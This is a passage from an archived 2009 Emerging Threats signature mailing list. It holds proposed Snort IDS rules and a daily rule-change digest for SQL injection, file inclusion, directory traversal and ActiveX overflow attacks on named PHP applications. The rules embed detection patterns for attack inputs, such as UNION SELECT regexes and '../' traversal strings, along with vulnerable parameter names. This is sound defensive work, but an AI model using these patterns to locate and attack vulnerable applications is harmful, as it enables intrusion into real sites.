uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:cve,CVE-2008-6242; reference:bugtraq,32039; > reference:url,milw0rm.com/exploits/6922; sid:2009491; rev:1;) > > 13. *WEB-PHP NotFTP config.php languages Parameter Local File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > NotFTP config.php languages Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/config.php?"; nocase; uricontent:"newlang=kacper"; nocase; > uricontent:"languages[kacper][file]="; nocase; content:"../"; > classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8504; reference:bugtraq,34636; > sid:2009492; rev:1;) > > 14. *WEB-PHP TotalCalendar cms_detect.php include Parameter Local File > Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > TotalCalendar cms_detect.php include Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/cms_detect.php?"; nocase; uricontent:"include="; nocase; > content:"../"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8503; reference:bugtraq,34634; > sid:2009493; rev:1;) > > 15. *WEB-PHP AvailScript Article Script articles.php aIDS Parameter > SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > AvailScript Article Script articles.php aIDS Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/articles.php?"; nocase; uricontent:"aIDS="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:cve,CVE-2008-4371; > reference:url,secunia.com/advisories/31816/; > reference:url,milw0rm.com/exploits/6409; sid:2009494; rev:1;) > > 16. *WEB-PHP JobHut browse.php pk Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > JobHut browse.php pk Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/browse.php?"; nocase; uricontent:"pk="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,34300; reference:url,milw0rm.com/exploits/8318; > sid:2009495; rev:1;) > > 17. *WEB-PHP VS Panel showcat.php Cat_ID Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > VS Panel showcat.php Cat_ID Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/showcat.php?"; nocase; uricontent:"Cat_ID="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,34648; reference:url,milw0rm.com/exploits/8506; > sid:2009500; rev:1;) > > 18. *WEB-PHP Golabi index_logged.php cur_module Parameter Remote File > Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > Golabi index_logged.php cur_module Parameter Remote File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/index_logged.php?"; nocase; uricontent:"main_loaded="; > nocase; uricontent:"cur_module="; nocase; > pcre:"/cur_module=\s*(https?|ftps?|php)\:\//Ui"; > classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8112; > reference:url,vupen.com/english/advisories/2009/0553; > reference:bugtraq,33916; sid:2009501; rev:1;) > > 19. *WEB-PHP 212cafe Board view.php qID Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > 212cafe Board view.php qID Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/view.php?"; nocase; uricontent:"qID="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,31426; reference:url,xforce.iss.net/xforce/xfdb/45428; > reference:url,milw0rm.com/exploits/6578; sid:7549; rev:1;) > > 20. *WEB-ATTACKS Roxio CinePlayer IAManager.dll ActiveX Control Buffer > Overflow* > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS > Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow"; > flow:to_client,established; content:"clsid"; nocase; > content:"EE1BBA18-F0C8-477E-8AC8-C28B94F1B7DC"; nocase; distance:0; > content:"SetIAPlayerName"; nocase; classtype:web-application-attack; > reference:url,xforce.iss.net/xforce/xfdb/50868; > reference:url,milw0rm.com/exploits/8835; sid:2009639; rev:1;) > > 21. *WEB-ATTACKS SAP AG SAPgui sapirrfc.dll ActiveX Control Buffer > Overflow* > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS > SAP AG SAPgui sapirrfc.dll ActiveX Control Buffer Overflow"; > flow:to_client,established; content:"clsid"; nocase; > content:"77F12F8A-F117-11D0-8CF1-00A0C91D9D87"; nocase; distance:0; > content:"Accept"; nocase; classtype:web-application-attack; > reference:url,xforce.iss.net/xforce/xfdb/50977; reference:bugtraq,35256; > reference:url,milw0rm.com/exploits/8899; sid:7660; rev:1;) > > 22. *WEB-PHP ProjectCMS select_image.php dir Parameter Directory > Traversal* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > ProjectCMS select_image.php dir Parameter Directory Traversal"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/imagelibrary/select_image.php?"; nocase; uricontent:"dir="; > nocase; content:"../"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8608; reference:bugtraq,34816; > sid:7526; rev:1;) > > 23. *WEB-PHP ProjectCMS admin_theme_remove.php file Parameter Remote > Directory Delete* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > ProjectCMS admin_theme_remove.php file Parameter Remote Directory > Delete"; flow:to_server,established; content:"GET "; depth:4; > uricontent:"/admin_includes/admin_theme_remove.php?"; nocase; > uricontent:"file="; nocase; content:"../"; > classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8608; reference:bugtraq,34816; > sid:7527; rev:1;) > > 24. *WEB-PHP X-BLC get_read.php section Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > X-BLC get_read.php section Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/include/get_read.php?"; nocase; uricontent:"section="; > nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8258; reference:bugtraq,34197; > sid:7528; rev:1;) > > 25. *WEB-PHP DMXReady Multiple Products upload_image_category.asp cid > Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > DMXReady Multiple Products upload_image_category.asp cid Parameter SQL > Injection"; flow:to_server,established; content:"GET "; depth:4; > uricontent:"/upload_image_category.asp?"; nocase; uricontent:"cid="; > nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,33253; reference:url,xforce.iss.net/xforce/xfdb/47959; > reference:url,milw0rm.com/exploits/7767; sid:7529; rev:1;) > > 26. *WEB-PHP BibCiter projects.php idp Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > BibCiter projects.php idp Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/reports/projects.php?"; nocase; uricontent:"idp="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,secunia.com/advisories/33555; reference:bugtraq,33329; > reference:url,milw0rm.com/exploits/7814; sid:7530; rev:1;) > > 27. *WEB-PHP BibCiter contacts.php idc Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > BibCiter contacts.php idc Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/reports/contacts.php?"; nocase; uricontent:"idc="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,secunia.com/advisories/33555; reference:bugtraq,33329; > reference:url,milw0rm.com/exploits/7814; sid:7531; rev:1;) > > 28. *WEB-PHP BibCiter users.php idu Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > BibCiter users.php idu Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/reports/users.php?"; nocase; uricontent:"idu="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,secunia.com/advisories/33555; reference:bugtraq,33329; > reference:url,milw0rm.com/exploits/7814; sid:7532; rev:1;) > > 29. *WEB-PHP phpDatingClub website.php page Parameter Local File > Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > phpDatingClub website.php page Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/website.php?"; nocase; uricontent:"page="; nocase; > content:"../"; classtype:web-application-attack; > reference:bugtraq,30176; reference:url,milw0rm.com/exploits/6037; > sid:7533; rev:1;) > > 30. *WEB-PHP SuperNews valor.php noticia Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > SuperNews valor.php noticia Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/valor.php?"; nocase; uricontent:"noticia="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8255; reference:bugtraq,34195; > sid:7548; rev:1;) > > Looking forward for your comments, if any? > > > Thanks & Regards, > StillSecure > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Mon Aug 10 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Mon, 10 Aug 2009 16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090810200012.3DF1C4504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Mon Aug 10 16:00:12 2009 [***] [+++] Added rules: [+++] 2009714 - ET WEB Script tag in URI, Possible Cross Site Scripting Attempt (emerging-web.rules) 2009715 - ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt (emerging-web.rules) 2009716 - ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection (emerging-web_sql_injection.rules) 2009717 - ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009718 - ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection (emerging-web_sql_injection.rules) 2009719 - ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion (emerging-web_sql_injection.rules) 2009720 - ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion (emerging-web_sql_injection.rules) 2009723 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009724 - ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009725 - ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow (emerging-web.rules) 2009726 - ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009727 - ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection (emerging-web_sql_injection.rules) 2009728 - ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009729 - ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009730 - ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection (emerging-web_sql_injection.rules) 2009731 - ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection (emerging-web_sql_injection.rules) 2009733 - ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009734 - ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection (emerging-web_sql_injection.rules) 2009735 - ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow (emerging-web.rules) 2009736 - ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal (emerging-web_sql_injection.rules) 2009737 - ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete (emerging-web_sql_injection.rules) 2009738 - ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection (emerging-web_sql_injection.rules) 2009739 - ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection (emerging-web_sql_injection.rules) 2009740 - ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection (emerging-web_sql_injection.rules) 2009741 - ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection (emerging-web_sql_injection.rules) 2009742 - ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection (emerging-web_sql_injection.rules) 2009743 - ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009744 - ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection (emerging-web_sql_injection.rules) 2009745 - ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009746 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009747 - ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection (emerging-web_sql_injection.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (69): 2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || url,ha.ckers.org/xss.html 2009715 || ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt || url,www.w3schools.com/jsref/jsref_onmouseover.asp 2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,milw0rm.com/exploits/8548 || bugtraq,34733 2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360 2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection || url,milw0rm.com/exploits/6411 || bugtraq,31085 2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009720 || ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || bugtraq,23412 || url,milw0rm.com/exploits/8824 2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,milw0rm.com/exploits/8494 || bugtraq,34617 2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242 2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || bugtraq,34636 || url,milw0rm.com/exploits/8504 2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || bugtraq,34634 || url,milw0rm.com/exploits/8503 2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection || url,milw0rm.com/exploits/8318 || bugtraq,34300 2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,milw0rm.com/exploits/8506 || bugtraq,34648 2009733 || ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112 2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || bugtraq,31426 2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868 2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || bugtraq,34197 || url,milw0rm.com/exploits/8258 2009739 || ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253 2009740 || ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,milw0rm.com/exploits/6037 || bugtraq,30176 2009744 || ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection || bugtraq,34195 || url,milw0rm.com/exploits/8255 2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || bugtraq,34734 || url,milw0rm.com/exploits/8549 2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection || url,milw0rm.com/exploits/6409 || url,secunia.com/advisories/31816/ || cve,CVE-2008-4371 2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org 2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (69): 2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || url,ha.ckers.org/xss.html 2009715 || ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt || url,www.w3schools.com/jsref/jsref_onmouseover.asp 2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,milw0rm.com/exploits/8548 || bugtraq,34733 2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360 2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection || url,milw0rm.com/exploits/6411 || bugtraq,31085 2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009720 || ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || bugtraq,23412 || url,milw0rm.com/exploits/8824 2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,milw0rm.com/exploits/8494 || bugtraq,34617 2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242 2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || bugtraq,34636 || url,milw0rm.com/exploits/8504 2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || bugtraq,34634 || url,milw0rm.com/exploits/8503 2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection || url,milw0rm.com/exploits/8318 || bugtraq,34300 2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,milw0rm.com/exploits/8506 || bugtraq,34648 2009733 || ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112 2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || bugtraq,31426 2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868 2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || bugtraq,34197 || url,milw0rm.com/exploits/8258 2009739 || ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253 2009740 || ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,milw0rm.com/exploits/6037 || bugtraq,30176 2009744 || ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection || bugtraq,34195 || url,milw0rm.com/exploits/8255 2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || bugtraq,34734 || url,milw0rm.com/exploits/8549 2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php 